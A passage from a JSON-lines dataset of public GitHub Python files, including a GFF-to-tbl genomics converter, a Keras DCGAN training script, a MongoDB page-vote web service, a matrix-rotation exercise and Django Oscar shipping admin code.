\"asia\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Inconrrect!\")\r\n\r\nprint(\"\\nYou got \" + str(score) + \"/4 questions\")\r\nprint(\"You got \" + str(score / 4 * 100) + \"/%\")","repo_name":"VM302008/python-basics","sub_path":"quizGame.py","file_name":"quizGame.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30264257393","text":"#!/usr/bin/env python\nimport operator\nimport sys\n\nINCLUDE_FEATURE_TYPES = ('mRNA', 'miRNA', 'ncRNA', 'tRNA', 'rRNA', 'snRNA', 'snoRNA', 'CDS', 'exon')\n\n\ndef iterate_gff_body(filename):\n with open(filename, 'r') as handle:\n for line in handle:\n if line.startswith('###'):\n return\n if line.startswith('##'):\n continue\n seq_id, source, feature_type, start, end, score, strand, phase, attributes_str = line.rstrip().split('\\t')\n if feature_type not in INCLUDE_FEATURE_TYPES:\n continue\n attributes = dict()\n for element in attributes_str.split(';'):\n key, value = element.split('=')\n if key == 'Parent':\n attributes[key] = value.split(',')\n elif key == 'ID':\n attributes[key] = value\n elif key == 'Name':\n attributes[key] = value\n # Make intervals half-open and zero-based (in GFF they are closed intervals and 1-based) ...\n yield feature_type, seq_id, int(start) - 1, int(end), strand, attributes\n\n\nclass Entry:\n @staticmethod\n def from_mRNA(feature_id, chromosome, tx, strand, gene_id):\n entry = Entry(feature_id)\n entry.chromosome, entry.tx, entry.strand, entry.gene_id = chromosome, tx, strand, gene_id\n return entry\n\n def __init__(self, feature_id):\n self.feature_id, self.chromosome, self.tx, self.strand, self.CDSs, self.exons, self.gene_id = \\\n feature_id, '', (), '', [], [], ''\n\n def isempty(self):\n return len(self.tx) == 0\n\n def exon_count(self):\n return len(self.exons)\n\n def exon_starts(self):\n if self.exon_count() == 0:\n return tuple()\n return sorted(map(operator.itemgetter(0), self.exons))\n\n def exon_ends(self):\n if self.exon_count() == 0:\n return tuple()\n return sorted(map(operator.itemgetter(1), self.exons))\n\n def cds_span(self):\n if len(self.CDSs) == 0:\n return self.tx[1], self.tx[1]\n return min(map(operator.itemgetter(0), self.CDSs)), max(map(operator.itemgetter(1), self.CDSs))\n\n\ndef load_data(gff_filename):\n feature_id2entry = dict()\n for feature_type, chromosome, start, end, strand, attributes in iterate_gff_body(gff_filename):\n if feature_type.endswith('RNA'):\n # Analyze attributes ...\n if 'ID' not in attributes:\n print(\"'{0:s}' entry ({1:s} {2:d} {3:d} {4:s}) has no ID attribute.\".format(feature_type, chromosome,\n start, end, strand),\n file=sys.stderr)\n sys.exit(1)\n feature_id = attributes['ID']\n if 'Parent' in attributes and len(attributes['Parent']) == 1:\n gene_id = attributes['Parent'][0]\n elif 'Name' in attributes:\n gene_id = attributes['Name']\n else:\n print(\"'{0:s}' entry (ID: {1:s}) cannot be associated with a geneID.\".format(feature_type, feature_id),\n file=sys.stderr)\n sys.exit(1)\n\n if feature_id in feature_id2entry.keys():\n # if feature_id2entry[feature_id].chromosome != chromosome or feature_id2entry[feature_id].strand != strand:\n # print(\"'mRNA' entry not compatible with child entry.\", file=sys.stderr)\n # sys.exit(1)\n feature_id2entry[feature_id].chromosome = chromosome\n feature_id2entry[feature_id].tx = (start, end)\n feature_id2entry[feature_id].strand = strand\n feature_id2entry[feature_id].gene_id = gene_id\n else:\n feature_id2entry[feature_id] = Entry.from_mRNA(feature_id, chromosome, (start, end), strand, gene_id)\n elif feature_type == 'exon':\n if 'Parent' not in attributes:\n print(\"'exon' entry (ID: {0:s}) has no Parent attribute.\".format(feature_id), file=sys.stderr)\n sys.exit(1)\n exon = (start, end)\n for parent_id in attributes['Parent']:\n if parent_id not in feature_id2entry.keys():\n feature_id2entry[parent_id] = Entry(parent_id)\n # elif feature_id2entry[parent_id].chromosome != chromosome or feature_id2entry[parent_id].strand != strand:\n # print(\"'exon' entry not compatible with parent 'mRNA' entry {0:s}.\".format(parent_id),\n # file=sys.stderr)\n # sys.exit(1)\n feature_id2entry[parent_id].exons.append(exon)\n # feature_id2entry[parent_id].chromosome = chromosome\n # feature_id2entry[parent_id].strand = strand\n elif feature_type == 'CDS':\n if 'Parent' not in attributes:\n print(\"'CDS' entry (ID: {0:s}) has no Parent attribute.\".format(feature_id), file=sys.stderr)\n sys.exit(1)\n CDS = (start, end)\n for parent_id in attributes['Parent']:\n if parent_id not in feature_id2entry.keys():\n feature_id2entry[parent_id] = Entry(parent_id)\n # elif feature_id2entry[parent_id].chromosome != chromosome or feature_id2entry[parent_id].strand != strand:\n # print(\"'CDS' entry not compatible with parent 'mRNA' entry {0:s}.\".format(parent_id),\n # file=sys.stderr)\n # sys.exit(1)\n feature_id2entry[parent_id].CDSs.append(CDS)\n # feature_id2entry[parent_id].chromosome = chromosome\n # feature_id2entry[parent_id].strand = strand\n return feature_id2entry\n\n\ndef main():\n if len(sys.argv) != 2:\n print('Wrong number of input arguments.', file=sys.stderr)\n sys.exit(2)\n gff_filename = sys.argv[1]\n print('Loading GFF into memory ...', file=sys.stderr)\n feature_id2entry = load_data(gff_filename)\n print('Conversion to tbl format ...', file=sys.stderr)\n print('#bin', 'name', 'chrom', 'strand', 'txStart', 'txEnd', 'cdsStart', 'cdsEnd', 'exonCount',\n 'exonStarts', 'exonEnds', 'score', 'name2', 'cdsStartStat', 'cdsEndStat', 'exonFrames',\n sep='\\t')\n\n for feature_id, entry in feature_id2entry.items():\n if entry.isempty():\n print('{0:s} is an empty entry.'.format(feature_id), file=sys.stderr)\n continue\n if entry.exon_count() == 0:\n entry.exons.append(entry.tx)\n cds = entry.cds_span()\n exon_starts = ','.join(map(str, entry.exon_starts())) + ','\n exon_ends = ','.join(map(str, entry.exon_ends())) + ','\n print('NA', feature_id, entry.chromosome, entry.strand, entry.tx[0], entry.tx[1], cds[0], cds[1],\n entry.exon_count(), exon_starts, exon_ends, 'NA', entry.gene_id, 'NA', 'NA', 'NA',\n sep='\\t')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aertslab/regulatory_regions_delineation","sub_path":"gff2tbl.py","file_name":"gff2tbl.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71581969386","text":"# -*- coding: utf-8 -*-\n\"\"\"Variety is a Python library for working with cryptic crosswords.\"\"\"\nimport os\n\nfrom cryptic import from_hex\nfrom hex import read as read_hex\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n # filename = \"puzzles/wsj020.yaml\"\n # filenames = [filename]\n\n skip = [\n \"puzzles/atl005.yaml\",\n ]\n\n filenames = []\n for file in os.listdir(\"puzzles\"):\n if file.endswith(\".yaml\"):\n filenames.append(os.path.join(\"puzzles\", file))\n\n for filename in sorted(filenames):\n if filename in skip:\n continue\n print(f\"# {filename}\")\n hex_dict = read_hex(filename)\n puzzle = from_hex(hex_dict)\n print(puzzle)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lukwam/variety","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5424404645","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhttps://www.tensorflow.org/tutorials/generative/dcgan\nCreated on Sun Jun 7 13:40:07 2020\n\n@author: Chris\n\"\"\"\n\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Reshape, Dropout, Dense \nfrom tensorflow.keras.layers import Flatten, BatchNormalization\nfrom tensorflow.keras.layers import Activation, ZeroPadding2D\nfrom tensorflow.keras.layers import LeakyReLU\nfrom tensorflow.keras.layers import UpSampling2D, Conv2D, AveragePooling2D, Dense, Conv2DTranspose\nfrom tensorflow.keras.models import Sequential, Model, load_model\nfrom tensorflow.keras.optimizers import Adam\nimport glob\nimport imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport PIL\nimport time\n\nfrom IPython import display\n\n#Fashion mnist Alternative dataset\n(train_images, train_labels), (_, _) = tf.keras.datasets.fashion_mnist.load_data()\n\n\n#PreProcessing Data\n# (train_images, train_labels), (_, _) = tf.keras.datasets.mnist.load_data()\ntrain_images = train_images.reshape(train_images.shape[0], 28, 28, 1).astype('float32')\ntrain_images = (train_images - 127.5) / 127.5 # Normalize the images to [-1, 1]\n\nBUFFER_SIZE = 60000\nBATCH_SIZE = 256\n# Batch and shuffle the data\ntrain_dataset = tf.data.Dataset.from_tensor_slices(train_images).shuffle(BUFFER_SIZE).batch(BATCH_SIZE)\n\nEPOCHS = 200\nnoise_dim = 100\nnum_examples_to_generate = 16\nseed = tf.random.normal([num_examples_to_generate, noise_dim])\n\n \ndef build_discriminator(image_shape):\n\n model = tf.keras.Sequential()\n model.add(Conv2D(64, (5, 5), strides=(2, 2), padding='same',\n input_shape=[28, 28, 1]))\n model.add(LeakyReLU())\n model.add(Dropout(0.3))\n\n model.add(Conv2D(128, (5, 5), strides=(2, 2), padding='same'))\n model.add(LeakyReLU())\n model.add(Dropout(0.3))\n\n model.add(Flatten())\n model.add(Dense(1))\n \n # model= Sequential(name=\"discriminator\")\n # model.add(Conv2D(28, kernel_size=2, strides=1, input_shape=image_shape,padding=\"same\"))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Activation(\"relu\"))\n # model.add(AveragePooling2D(pool_size=(2,2), strides=(1,1),padding=\"SAME\"))\n \n # model.add(Conv2D(64, kernel_size=1, strides=1, input_shape=image_shape,padding=\"same\"))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Activation(\"relu\"))\n # model.add(AveragePooling2D(pool_size=(2,2), strides=(1,1),padding=\"SAME\"))\n \n # model.add(Flatten())\n # model.add(Dense(7*7*64))\n # model.add(Activation(\"relu\"))\n # model.add(Dense(1))\n # model.add(Activation(\"sigmoid\"))\n\n # model.summary()\n return model\n\n\n\ndef build_generator(z_dim):\n model = Sequential(name=\"Generator\")\n model.add(Dense(7*7*256, use_bias=False, input_shape=(z_dim,)))\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Reshape((7, 7, 256)))\n assert model.output_shape == (None, 7, 7, 256) # Note: None is the batch size\n\n model.add(Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False))\n assert model.output_shape == (None, 7, 7, 128)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(64, (5, 5), strides=(2, 2), padding='same', use_bias=False))\n assert model.output_shape == (None, 14, 14, 64)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(1, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='tanh'))\n assert model.output_shape == (None, 28, 28, 1)\n \n # model.summary()\n \n return model\n\n#Initialising Generator \nz_dim=100\ngenerator = build_generator(z_dim)\n\n#Test Generator Function\nnoise = tf.random.normal([1, 100])\ngenerated_image = generator(noise, training=False)\nplt.imshow(generated_image[0, :, :, 0], cmap='gray')\n\n#Initilaise Disciminaotr\nimage_shape=[28,28,1]\ndiscriminator = build_discriminator(image_shape)\n\n#Test Discriminator\ndecision = discriminator(generated_image)\nprint (decision)\n\n \n#################################################\n#Loss\n################################################\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\ndef discriminator_loss(real_output, fake_output):\n real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)\n total_loss = real_loss + fake_loss\n return total_loss\n\ndef generator_loss(fake_output): #Preidct the fake output are real\n return cross_entropy(tf.ones_like(fake_output), fake_output)\n\n#Define optimisers\ngenerator_optimizer = tf.keras.optimizers.Adam(1e-4)\ndiscriminator_optimizer = tf.keras.optimizers.Adam(1e-4)\n\n\n\n\n###################################################################################\n#Utility code\n###################################################################################\n\ncheckpoint_dir = './training_checkpoints'\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\ncheckpoint = tf.train.Checkpoint(generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n generator=generator,\n discriminator=discriminator)\n\ndef generate_and_save_images(model, epoch, test_input):\n # Notice `training` is set to False.\n # This is so all layers run in inference mode (batchnorm).\n predictions = model(test_input, training=False) #Test Model\n\n #Plot model \n fig = plt.figure(figsize=(4,4)) \n\n for i in range(predictions.shape[0]):\n plt.subplot(4, 4, i+1)\n plt.imshow(predictions[i, :, :, 0] * 127.5 + 127.5, cmap='gray')\n plt.axis('off')\n\n plt.savefig('image_at_epoch_{:04d}.png'.format(epoch))\n plt.show()\n\n\n################################################\n#Training\n###############################################\n\n\n#`tf.function` - Compiles a function in a callable tensorflow Graph \n@tf.function\ndef train_step(images):\n noise = tf.random.normal([BATCH_SIZE, noise_dim])\n \n #tf.gradientTape - Record operation for automatic differntiation \n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n generated_images = generator(noise, training=True) #Generate Image\n\n real_output = discriminator(images, training=True) #Discrimate real output \n fake_output = discriminator(generated_images, training=True) #Discriminate fake output\n\n gen_loss = generator_loss(fake_output) #Ability to fakeout the discriminator max -log(D(G(z)))\n disc_loss = discriminator_loss(real_output, fake_output) #Ability to identify fake and truth \n\n #Differentiate w.r.t to trainable variables\n gradients_of_generator = gen_tape.gradient(gen_loss, generator.trainable_variables) \n gradients_of_discriminator = disc_tape.gradient(disc_loss, discriminator.trainable_variables)\n \n #Apply optimiser \"apply_gradient class\" on the zip-ed gradient trainable variable pairs\"\n generator_optimizer.apply_gradients(zip(gradients_of_generator, generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, discriminator.trainable_variables))\n return (gen_loss,disc_loss)\n \ndef train(dataset, epochs):\n \n#Train per epoch \n for epoch in range(epochs):\n start = time.time()\n \n #Mini-batch training \n for image_batch in dataset:\n gLoss,dLoss=train_step(image_batch)\n \n print (\"Generator Loss: %f, Discriminator Loss %f\"%(gLoss,dLoss))\n\n # Produce images for the GIF as we go\n display.clear_output(wait=True)\n generate_and_save_images(generator,epoch + 1,seed)\n\n # Save the model every 15 epochs\n if (epoch + 1) % 15 == 0:\n checkpoint.save(file_prefix = checkpoint_prefix)\n\n print ('Time for epoch {} is {} sec'.format(epoch + 1, time.time()-start))\n\n # Generate after the final epoch\n display.clear_output(wait=True)\n generate_and_save_images(generator,\n epochs,\n seed)\n\n#Train model\ntrain(train_dataset, EPOCHS)\n\n#Generate Gif\n# Display a single image using the epoch number\ndef display_image(epoch_no):\n return PIL.Image.open('image_at_epoch_{:04d}.png'.format(epoch_no))\n\ndisplay_image(EPOCHS)","repo_name":"Bearwithchris/ResearchCode","sub_path":"Reference_GAN/GAN_demo/GAN_keras_mnist/GAN_Keras_attempt.PY","file_name":"GAN_Keras_attempt.PY","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5579028697","text":"#!/usr/bin/env python3\nimport datetime\nimport json\nimport logging\nimport os\nimport sys\nimport urllib.parse\nfrom typing import Callable, Dict, Optional, Union\n\nimport pymongo\nimport werkzeug.serving\nfrom werkzeug.wrappers import Request, Response\nfrom werkzeug.exceptions import HTTPException, BadRequest, MethodNotAllowed\n\nfrom .utils import anonymize_ip\n\nlogger = logging.getLogger(__name__)\n\nFieldValueType = Union[bool, str, int, float]\nEMPTY_BMP = b'BM\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x0c\\x00' \\\n b'\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x18\\x00\\x00\\x00\\xff\\x00'\n\n\nclass Vote:\n MAX_KEY_LEN = 25\n MAX_PAGE_LEN = 255\n MAX_REASON_LEN = 1024\n\n def __init__(self,\n page: str,\n useful: bool,\n fields: Dict[str, FieldValueType],\n ip: Optional[str],\n vote_id: Optional[str]) -> None:\n self.page = page\n self.useful = useful\n self.fields = fields\n\n self.ip = None\n if ip is not None:\n try:\n self.ip = anonymize_ip(ip)\n except ValueError:\n pass\n\n self.vote_id = None\n if vote_id is not None:\n try:\n self.vote_id = vote_id\n except ValueError:\n pass\n\n @classmethod\n def parse(cls, request: Request) -> 'Vote':\n ip = request.access_route[0] if len(request.access_route) > 0 else None\n\n try:\n parameters = cls.parse_qs(request.query_string)\n\n page = parameters['p']\n useful = parameters['v']\n vote_id = parameters['vId']\n\n if not isinstance(page, str):\n raise TypeError('Invalid page type')\n\n if not isinstance(useful, bool):\n raise TypeError('Invalid useful type')\n\n if not isinstance(vote_id, str):\n raise TypeError('Invalid voteId type')\n\n del parameters['p']\n del parameters['v']\n del parameters['vId']\n\n return cls(page[:cls.MAX_PAGE_LEN], useful, parameters, ip, vote_id)\n except (KeyError, ValueError, TypeError) as err:\n logger.exception('Invalid vote request')\n raise ValueError('Invalid vote request') from err\n\n @classmethod\n def parse_qs(cls, query_string: bytes) -> Dict[str, FieldValueType]:\n parameters = urllib.parse.parse_qs(str(query_string, 'utf-8'))\n parsed = {} # type: Dict[str, FieldValueType]\n for key, value in parameters.items():\n if len(key) > cls.MAX_KEY_LEN:\n raise ValueError('Key too long')\n\n value = json.loads(value[0][:cls.MAX_REASON_LEN])\n if not (isinstance(value, (str, bool, int, float))):\n raise TypeError('Invalid value type')\n\n parsed[key] = value\n\n return parsed\n\n\nclass Connection:\n \"\"\"A database backend connection\"\"\"\n def __init__(self, connection_uri: str, votesSizeBytes: int) -> None:\n self.conn = pymongo.mongo_client.MongoClient(connection_uri, ssl=True)\n self.db = self.conn['deluge']\n\n try:\n self.db.create_collection('votes', capped=True, size=votesSizeBytes)\n except pymongo.errors.CollectionInvalid:\n pass\n\n self.votes = self.db['votes']\n self.votes.create_index('page')\n self.votes.create_index('voteId')\n\n try:\n self.db.create_collection('votesInitial', capped=True, size=votesSizeBytes)\n except pymongo.errors.CollectionInvalid:\n pass\n\n self.votes_initial = self.db['votesInitial']\n self.votes_initial.create_index('page')\n self.votes.create_index('voteId')\n\n def vote(self, vote: Vote) -> None:\n \"\"\"Record a vote for the given page path.\"\"\"\n doc = {'page': vote.page,\n 'useful': vote.useful,\n 'ip': vote.ip,\n 'date': datetime.datetime.utcnow(),\n 'voteId': vote.vote_id}\n for key, value in vote.fields.items():\n doc['q-{}'.format(key)] = value\n self.votes.save(doc)\n\n def vote_initial(self, vote: Vote) -> None:\n \"\"\"Record an initial vote of yes or no for the given page path.\"\"\"\n doc = {'page': vote.page,\n 'useful': vote.useful,\n 'ip': vote.ip,\n 'date': datetime.datetime.utcnow(),\n 'voteId': vote.vote_id}\n self.votes_initial.save(doc)\n\n\nclass Deluge:\n \"\"\"An HTTP frontent to Deluge.\"\"\"\n def __init__(self, host: str) -> None:\n self.connection = Connection(host, 5*1024*1024*1024)\n\n @Request.application\n def application(self, request: Request) -> Union[Response, HTTPException]:\n \"\"\"The Werkzeug WSGI request handler.\"\"\"\n if request.method != 'GET':\n return MethodNotAllowed(valid_methods=('GET',))\n\n if request.path == '/health':\n return Response('')\n\n if request.path == '/initial_vote':\n try:\n vote = Vote.parse(request)\n except ValueError:\n return BadRequest()\n\n self.connection.vote_initial(vote)\n return Response(EMPTY_BMP, content_type='image/bmp')\n\n try:\n vote = Vote.parse(request)\n except ValueError:\n return BadRequest()\n\n self.connection.vote(vote)\n return Response(EMPTY_BMP, content_type='image/bmp')\n\n @classmethod\n def run(cls) -> Callable[[Request], Union[Response, HTTPException]]:\n \"\"\"Create a Deluge instance and return the associated WSGI application\n using environment variables for configuration. Intended as an\n application entry point.\"\"\"\n logging.basicConfig(level=logging.INFO)\n try:\n mongodb_host = os.environ['CONNECTION_STRING']\n except KeyError:\n logger.critical('Must specify CONNECTION_STRING in environment')\n sys.exit(1)\n\n logger.info('Connecting to %s', mongodb_host)\n return cls(mongodb_host).application\n\n\napplication = Deluge.run()\n\n\ndef main() -> None:\n werkzeug.serving.run_simple('localhost', 4000, application)\n","repo_name":"mongodb/deluge","sub_path":"deluge/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"22884247770","text":"\"\"\"\nFastlane bot configuration object -- selector constants\n\"\"\"\n\nNETWORK_ETHEREUM = \"ethereum\"\nNETWORK_MAINNET = NETWORK_ETHEREUM\nNETWORK_TENDERLY = \"tenderly\"\nNETWORK_BASE = \"coinbase_base\"\nNETWORK_ARBITRUM = \"arbitrum_one\"\nNETWORK_OPTIMISM = \"optimism\"\nNETWORK_CANTO = \"canto\"\nNETWORK_FANTOM = \"fantom\"\nNETWORK_MANTLE = \"mantle\"\nNETWORK_SCROLL = \"scroll\"\nNETWORK_BSC = \"binance_smart_chain\"\nNETWORK_POLYGON = \"polygon\"\nNETWORK_POLYGON_ZKEVM = \"polygon_zkevm\"\n\nDATABASE_SQLITE = \"sqlite\"\nDATABASE_POSTGRES = \"postgres\"\nDATABASE_MEMORY = \"memory\"\nDATABASE_SDK = \"sdk\"\nDATABASE_UNITTEST = \"unittest\"\n\nLOGGER_DEFAULT = \"default\"\n\nLOGLEVEL_DEBUG = \"debug\"\nLOGLEVEL_INFO = \"info\"\nLOGLEVEL_WARNING = \"warning\"\nLOGLEVEL_ERROR = \"error\"\nLOGLEVEL_BANCOR_V2 = \"bancor_v2\"\n\nPROVIDER_DEFAULT = \"default\" # the default provider for network\nPROVIDER_INFURA = \"infura\"\nPROVIDER_ALCHEMY = \"alchemy\"\nPROVIDER_TENDERLY = \"tenderly\"\nPROVIDER_UNITTEST = \"unittest\"\n\n# Constants\nFACTORY_ADDRESS = \"FACTORY_ADDRESS\"\nROUTER_ADDRESS = \"ROUTER_ADDRESS\"\nCARBON_CONTROLLER_ADDRESS = \"CARBON_CONTROLLER_ADDRESS\"\nCARBON_CONTROLLER = \"CARBON_CONTROLLER\"\nBALANCER_VAULT_ADDRESS = \"BALANCER_VAULT_ADDRESS\"\nUNISWAP_V2 = \"uniswap_v2\"\nUNISWAP_V3 = \"uniswap_v3\"\nSOLIDLY = \"solidly_v2\"\nCARBON_V1 = \"carbon_v1\"","repo_name":"bancorprotocol/fastlane-bot","sub_path":"fastlane_bot/config/selectors.py","file_name":"selectors.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"37"} +{"seq_id":"33432630912","text":"\"\"\"\nGallery\n-------\n\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom IPython.display import display\nfrom ipywidgets import (\n Button,\n HBox,\n Layout,\n Output\n)\nfrom typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n from datatype.interactive import Interactive\n\n\nclass Gallery:\n def __init__(self, collection: list[Interactive]):\n self.collection = collection\n\n self.index = 0\n self.length = len(self.collection)\n self.output = Output()\n self.next = Button(description='Next')\n self.previous = Button(description='Previous')\n\n def create(self) -> Output:\n \"\"\"Create the gallery display.\n\n Returns:\n An Output object representing the gallery display.\n\n \"\"\"\n\n with self.output:\n self.output.clear_output(wait=True)\n\n widget = self.collection[self.index]\n plot = widget.create()\n\n button = HBox(\n [self.previous, self.next],\n layout=Layout(\n align_items='center',\n display='flex',\n flex_flow='row',\n align_content='stretch',\n justify_content='center'\n )\n )\n\n button.add_class('button')\n\n self.set_event_listener()\n\n display(plot)\n display(button)\n\n return self.output\n\n def on_next(self, _: Button) -> None:\n \"\"\"Event handler for the 'Next' button click.\n\n Args:\n button: The 'Next' button widget.\n\n \"\"\"\n\n if self.index == self.length - 1:\n self.index = 0\n else:\n self.index = self.index + 1\n\n self.create()\n\n def on_previous(self, _: Button) -> None:\n \"\"\"Event handler for the 'Previous' button click.\n\n Args:\n button: The 'Previous' button widget.\n\n \"\"\"\n\n if self.index == 0:\n self.index = self.length - 1\n else:\n self.index = self.index - 1\n\n self.create()\n\n def set_event_listener(self) -> None:\n \"\"\"Set event listeners for the 'Next' and 'Previous' buttons.\"\"\"\n\n self.next.on_click(self.on_next)\n self.previous.on_click(self.on_previous)\n","repo_name":"braycarlson/warbler.py","sub_path":"warbler.py/datatype/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39388436109","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 26 21:44:30 2017\n\n@author: saul\n\nFunción para contar las palabras dentro de un texto.\n\nPasar como parametro el vector que almacena el texto\nNota: El texto no debe tener letras con acento.\n\n\"\"\"\ndef contarPalabras(vector):\n l = 0 # longitud del vector\n j = 0 # apuntador\n nPal = 0 # numero de palabras\n iniCad = False # cuando inicia una palabra\n finCad = False # cuando termina la palabra\n tamVec = len(vector)\n \n while(l < len(vector)):\n # recorrer el vector de letras\n for i in range(j, tamVec):\n # letras mayusculas\n if ord(vector[i]) >= 65 and ord(vector[i]) <= 90:\n iniCad = True\n # letras minusculas\n elif ord(vector[i]) >= 97 and ord(vector[i]) <= 122:\n iniCad = True\n else:\n if iniCad == True:\n finCad = True\n \n # se evalua si es la ultima palabra\n if l == tamVec:\n if iniCad == True:\n finCad = True\n \n l = l + 1 # incrementar\n \n # si se encontro una palabra\n if iniCad == True and finCad == True:\n nPal = nPal + 1 # se contabiliza la palabra\n # resetear variables de apoyo\n iniCad = False\n finCad = False\n j = i\n break # salir del for\n \n return nPal\n","repo_name":"ticsaul/contar_palabras","sub_path":"contar_palabras.py","file_name":"contar_palabras.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24199254430","text":"\"\"\"\nquestion:\nGiven an image represented by an NxN matrix, where each pixel in the image is 4 bytes, write a method to rotate the\nimage by 90 degrees. Can you do this in place?\n\nsource:\nMcDowell, Gayle Laakmann., Cracking the Coding Interview: 189 Programming Questions and Solutions 6th Edition (2015) 203.\n\"\"\"\n\ndef rotate_matrix_90(matrix):\n \"\"\" rotate matrix in-place 90 degrees clockwise \"\"\"\n\n matrix_size = len(matrix)\n num_levels = matrix_size // 2\n\n def rotate_level(cur_level):\n \"\"\" rotate a level of matrix in-place 90 deg \"\"\"\n\n nonlocal matrix, matrix_size, num_levels\n\n # first and last(exclusive) matrix indexes of rows and cols in this level\n first = num_levels - cur_level\n last = (matrix_size - 1) - first\n\n # swap values from top, left, bottom and right sides\n # in-place (with help of temp var) to effect rotation\n for i in range(first, last, 1):\n\n # temp = top\n temp = matrix[first][i]\n # top = left\n matrix[first][i] = matrix[last - i][first]\n # left = bottom\n matrix[last - i][first] = matrix[last][last - i]\n # bottom = right\n matrix[last][last - i] = matrix[i][last]\n # right = temp\n matrix[i][last] = temp\n\n # rotate each level of matrix\n cur_level = num_levels\n while cur_level > 0:\n\n rotate_level(cur_level)\n cur_level -= 1\n\n\"\"\"\ntest\n\"\"\"\nif __name__ == '__main__':\n\n m = [[1,2],[3,4]]\n m1 = [[1,2,3],[4,5,6],[7,8,9]]\n m2 = [[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]\n\n rotate_matrix_90(m)\n rotate_matrix_90(m1)\n rotate_matrix_90(m2)\n\n assert m == [[3,1],[4,2]]\n assert m1 == [[7, 4, 1], [8, 5, 2], [9, 6, 3]]\n assert m2 == [[13, 9, 5, 1], [14, 10, 6, 2], [15, 7, 11, 3], [16, 12, 8, 4]]","repo_name":"parkerjgit/algorithms","sub_path":"python/arrays_and_strings/rotate_matrix.py","file_name":"rotate_matrix.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6262815935","text":"from django.contrib import admin\n\nfrom oscar.core.loading import get_model\n\nOrderAndItemCharges = get_model(\"shipping\", \"OrderAndItemCharges\")\nWeightBand = get_model(\"shipping\", \"WeightBand\")\nWeightBased = get_model(\"shipping\", \"WeightBased\")\n\n\nclass OrderChargesAdmin(admin.ModelAdmin):\n filter_horizontal = (\"countries\",)\n list_display = (\n \"name\",\n \"description\",\n \"price_per_order\",\n \"price_per_item\",\n \"free_shipping_threshold\",\n )\n\n\nclass WeightBandInline(admin.TabularInline):\n model = WeightBand\n\n\nclass WeightBasedAdmin(admin.ModelAdmin):\n filter_horizontal = (\"countries\",)\n inlines = [WeightBandInline]\n\n\nadmin.site.register(OrderAndItemCharges, OrderChargesAdmin)\nadmin.site.register(WeightBased, WeightBasedAdmin)\n","repo_name":"django-oscar/django-oscar","sub_path":"src/oscar/apps/shipping/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"} +{"seq_id":"33650494105","text":"import tensorflow as tf\nfrom SLAM import SLAM\nimport numpy as np\n\nclass SLAM_Layer(tf.keras.layers.Layer):\n def __init__(self, dense, tensorLen, relu=False):\n super(SLAM_Layer, self).__init__()\n # self.SLAM = SLAM(dense, relu=relu)\n self.dense = dense\n self.relu = relu\n self.tensorLen = tensorLen\n def build(self, input_shape):\n # print(\"OVERALL\", input_shape)\n # print(\"BUILD SHAPE\", input_shape[3])\n self.SLAM = SLAM(self.dense, matrixSize=input_shape[3], relu=self.relu)\n\n def call(self, x_main, x_aux):\n # watch out for batch norm - weird w training=True\n # print(x_main)\n # print(\"MAIN SHAPE\" , x_main.shape[3])\n\n aux_slices = tf.unstack(x_aux, axis=1) #axis=1 because 0th dimension is unknown\n main_slices = tf.unstack(x_main, axis=1) #axis=1 because 0th dimension is unknown\n\n # print(\"AUX SHAPE\" , aux_slices)\n # 